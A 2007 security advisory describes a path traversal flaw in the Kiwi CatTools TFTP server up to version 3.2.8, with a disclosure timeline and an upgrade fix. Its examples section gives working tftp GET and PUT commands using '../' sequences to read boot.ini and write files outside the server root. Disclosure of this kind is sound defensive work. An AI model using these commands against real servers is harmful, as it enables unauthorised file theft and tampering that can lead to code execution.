Kiwi CatTools TFTP <= 3.2.8 Remote Path Traversal Vulnerability

2007-02-27 00:00:00

Path traversal security vulnerability in Kiwi CatTools TFTP up to 3.2.8
server can lead to information disclosure and remote code execution

Risk: High

DISCUSSION

Kiwi CatTools TFTP server doesn.t properly verify filename in PUT and
GET request which can be used to download/upload any file from/to
server. Default setting allows replacing of existing files. Such
settings lead to probability to replace an executable files and run code
on attacker choice.

EXAMPLES

C:\>tftp -i 10.1.1.2 GET /x/../../../../../boot.ini boot.txt

Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type boot.txt

[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>tftp -i 10.1.1.2 PUT boot.txt /x/../../../../../pttest.txt

Transfer successful: 212 bytes in 1 second, 212 bytes/s

C:\>type pttest.txt

[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS

C:\>

SOLUTION

Upgrade to CatTools 3.2.9 which is available for download at
http://www.kiwisyslog.com/downloads.php

CREDITS

Sergey Gordeychik of Positive Technologies (www.ptsecurity.com)

DISCLOSURE TIMELINE

Vulnerability discovered: 11/20/2006

Initial vendor contact: 12/08/2006

Patch released: 02/13/2007

Public disclosure: 02/27/2007

#

Fixes

No fixes

In order to submit a new fix you need to be registered.